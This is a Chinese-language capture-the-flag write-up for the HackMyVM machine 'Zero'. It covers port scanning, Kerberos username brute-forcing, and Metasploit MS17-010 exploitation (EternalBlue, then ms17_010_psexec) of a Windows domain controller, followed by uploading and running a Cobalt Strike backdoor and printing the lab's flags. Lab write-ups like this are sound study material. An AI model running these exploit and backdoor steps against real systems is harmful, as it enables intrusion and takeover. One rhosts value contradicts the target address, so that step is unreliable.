23.Zero
1. 基本信息^toc
靶机链接:https://hackmyvm.eu/machines/machine.php?vm=Zero
作者:[ruycr4ft](https://hackmyvm.eu/profile/?user=ruycr4ft)
难度:⭐️
知识点:MS17-010
2. 信息收集
fscan -h 192.168.56.15
\_\_\_ \_
/ \_ \ \_\_\_ \_\_\_ \_ \_\_ \_\_ \_ \_\_\_| | \_\_
/ /\_\/\_\_\_\_/ \_\_|/ \_\_| '\_\_/ \_ |/ \_\_| |/ /
/ /\_\\\_\_\_\_\_\\_\_ \ (\_\_| | | (\_| | (\_\_| <
\\_\_\_\_/ |\_\_\_/\\_\_\_|\_| \\_\_,\_|\\_\_\_|\_|\\_\
fscan version: 1.8.4
start infoscan
192.168.56.15:445 open
192.168.56.15:139 open
192.168.56.15:135 open
192.168.56.15:88 open
[\*] alive ports len is: 4
start vulscan
[+] MS17-010 192.168.56.15 (Windows Server 2016 Standard Evaluation 14393)
[\*] NetBios 192.168.56.15 [+] DC:DC01.zero.hmv Windows Server 2016 Standard Evaluation 14393
[\*] NetInfo
[\*]192.168.56.15
[->]DC01
[->]192.168.56.15
已完成 4/4
[\*] 扫描结束,耗时: 3.061390899s
┌──(root㉿kali)-[/home/kali/hmv/Zero]
└─# nmap -sC -sV 192.168.56.15 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-21 07:06 CST
Nmap scan report for 192.168.56.15
Host is up (0.00015s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-20 22:37:00Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Defaute-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup:
464/tcp open kpasswd5?
593/tcp open ncacn\_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Defaute-Name)
3269/tcp open tcpwrapped
MAC Address: 08:00:27:CB:14:11 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|\_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:cb:14:11 (Oracle Virtual NIC)
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3
| Computer name: DC01
| NetBIOS computer name: DC01\x00
| Domain name: zero.hmv
| Forest name: zero.hmv
| FQDN: DC01.zero.hmv
|\_ System time: 2024-11-20T14:37:01-08:00
|\_clock-skew: mean: 2h09m55s, deviation: 4h37m07s, median: -30m04s
| smb-security-mode:
| account\_used: guest
| authentication\_level: user
| challenge\_response: supported
|\_ message\_signing: required
| smb2-time:
| date: 2024-11-20T22:37:01
|\_ start\_date: 2024-11-20T22:35:17
| smb2-security-mode:
| 3:1:1:
|\_ Message signing enabled and required
配置/etc/hosts
192.168.56.15 DC01.zero.hmv zero.hmv
发现有永恒之蓝。
直接上msf打一波看看
use exploit/windows/smb/ms17\_010\_eternalblue
set payload windows/x64/meterpreter/bind\_tcp\_uuid
set rhosts 172.22.11.45
run
直接给靶机干蓝屏了。重新利用好像不行了。
还是正常打吧。
3. 获取一个AD用户
3.1. SMB空会话检测
┌──(root㉿kali)-[/home/kali/hmv/Zero]
└─# smbmap -u guest -H zero.hmv
\_\_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_\_\_\_\_\_ \_\_\_ \_\_\_ \_\_ \_\_\_\_\_\_\_
/" )|" \ /" || \_ "\ |" \ /" | /""\ | \_\_ "\
(: \\_\_\_/ \ \ // |(. |\_) :) \ \ // | / \ (. |\_\_) :)
\\_\_\_ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: \_\_\_\_/
\_\_/ \ |: \. |(| \_ \ |: \. | // \_\_' \ (| /
/" \ :) |. \ /: ||: |\_) :)|. \ /: | / / \ \ /|\_\_/ \
(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_\_\_\_\_/ |\_\_\_|\\_\_/|\_\_\_|(\_\_\_/ \\_\_\_)(\_\_\_\_\_\_\_)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[\*] Detected 1 hosts serving SMB
[\*] Established 0 SMB session(s)
没有
3.2. kerbrute爆破用户
┌──(root㉿kali)-[/home/kali/hmv/Zero]
└─# kerbrute userenum -d zero.hmv -t 100 --dc DC01.zero.hmv /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -o valid\_user.txt
\_\_ \_\_ \_\_
/ /\_\_\_\_\_ \_\_\_\_\_/ /\_ \_\_\_\_\_\_\_ \_\_/ /\_\_\_\_
/ //\_/ \_ \/ \_\_\_/ \_\_ \/ \_\_\_/ / / / \_\_/ \_ \
/ ,< / \_\_/ / / /\_/ / / / /\_/ / /\_/ \_\_/
/\_/|\_|\\_\_\_/\_/ /\_.\_\_\_/\_/ \\_\_,\_/\\_\_/\\_\_\_/
Version: v1.0.3 (9dad6e1) - 11/21/24 - Ronnie Flathers @ropnop
2024/11/21 07:23:00 > Using KDC(s):
2024/11/21 07:23:00 > DC01.zero.hmv:88
2024/11/21 07:23:00 > [+] VALID USERNAME: administrator@zero.hmv
2024/11/21 07:23:00 > [+] VALID USERNAME: Administrator@zero.hmv
2024/11/21 07:26:17 > [+] VALID USERNAME: dc01@zero.hmv
2024/11/21 07:27:35 > Done! Tested 8295455 usernames (3 valid) in 275.149 seconds
也没有什么东西
4. 再打MS17-010
msf里面可不止一种MS17-010的利用
msf6 > search ms17
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17\_010\_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 \\_ target: Automatic Target . . . .
2 \\_ target: Windows 7 . . . .
3 \\_ target: Windows Embedded Standard 7 . . . .
4 \\_ target: Windows Server 2008 R2 . . . .
5 \\_ target: Windows 8 . . . .
6 \\_ target: Windows 8.1 . . . .
7 \\_ target: Windows Server 2012 . . . .
8 \\_ target: Windows 10 Pro . . . .
9 \\_ target: Windows 10 Enterprise Evaluation . . . .
10 exploit/windows/smb/ms17\_010\_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
11 \\_ target: Automatic . . . .
12 \\_ target: PowerShell . . . .
13 \\_ target: Native upload . . . .
14 \\_ target: MOF upload . . . .
15 \\_ AKA: ETERNALSYNERGY . . . .
16 \\_ AKA: ETERNALROMANCE . . . .
17 \\_ AKA: ETERNALCHAMPION . . . .
18 \\_ AKA: ETERNALBLUE . . . .
19 auxiliary/admin/smb/ms17\_010\_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
20 \\_ AKA: ETERNALSYNERGY . . . .
21 \\_ AKA: ETERNALROMANCE . . . .
22 \\_ AKA: ETERNALCHAMPION . . . .
23 \\_ AKA: ETERNALBLUE . . . .
24 auxiliary/scanner/smb/smb\_ms17\_010 . normal No MS17-010 SMB RCE Detection
25 \\_ AKA: DOUBLEPULSAR . . . .
26 \\_ AKA: ETERNALBLUE . . . .
27 exploit/windows/fileformat/office\_ms17\_11882 2017-11-15 manual No Microsoft Office CVE-2017-11882
28 auxiliary/admin/mssql/mssql\_escalate\_execute\_as . normal No Microsoft SQL Server Escalate EXECUTE AS
29 auxiliary/admin/mssql/mssql\_escalate\_execute\_as\_sqli . normal No Microsoft SQL Server SQLi Escalate Execute AS
30 exploit/windows/smb/smb\_doublepulsar\_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
31 \\_ target: Execute payload (x64) . . . .
32 \\_ target: Neutralize implant
试试exploit/windows/smb/ms17_010_psexec
use exploit/windows/smb/ms17\_010\_psexec
set rhost
run
上传cs后门并运行
upload 4444.exe C:\\4444.exe
excute -f C:\\4444.exe
system权限 已经拿下了
HMV{Z3r0\_l0g0n\_!s\_Pr3tty\_D4ng3r0u$}
HMV{D0nt\_r3us3\_p4$$w0rd5!}